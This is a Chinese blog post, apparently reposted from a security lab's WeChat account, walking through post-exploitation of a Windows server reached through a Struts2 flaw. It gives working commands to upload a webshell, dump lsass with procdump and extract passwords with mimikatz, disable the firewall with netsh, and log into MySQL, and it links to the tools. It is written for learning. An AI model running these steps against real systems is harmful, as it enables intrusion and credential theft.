平时挖SRC的时候,大多时候都是找的web、APP、小程序的漏洞,一般都是到get shell就打住不挖了,今天正好遇到一个struts2就开始简单认识一下内网。
首先执行命令进行信息搜集whoami、netstat -ano、systeminfo
得到的信息为服务器是64位的Windows Server 2008并且开启了rdp、mysql服务
然后传个冰蝎的shell
Get shell
对方服务器开启了rdp服务,使用mimikatz抓取对方服务器账号密码实现远程登录
使用procdump64+mimikatz可实现从内存中获取明文密码
procdump64+mimikatz工具
链接:https://pan.baidu.com/s/1eBJ5z8iSe5XlWE6zayG75g
提取码:vth3
下载成功解压即可,首先上传procdump64,右键上传即可,我直接上传到C盘的根目录了
然后执行命令
C:procdump64.exe -accepteula -ma lsass.exe lsass.dmp
文件lsass.dmp的路径在红色的框中把它右键下载到本地即可,然后放到目录mimikatz_trunk下
然后在本地使用mimikatz.exe读取此文件得到账号密码,命令如下
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
尝试登录失败了,应该是防火墙的问题,使用命令关闭掉防火墙
关闭防火墙:netsh advfirewall set allprofiles state off
打开防火墙:netsh advfirewall set allprofiles state on
再次登录,登录成功
转战数据库
通过shell翻翻文件有没有mysql的账号密码
在文件user.MYD里面翻到了账号,密码加密了,使用mysql5进行解密成功
因为开始通过端口扫描我扫到的mysql端口是50006所以按照这个端口连接的时候一直失败,最后往上翻了翻开始的搜集的信息
构造命令 连接成功
mysql://root:[email protected]:3306/mysql
原文始发于微信公众号(赛瑞攻防实验室):初识内网一
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论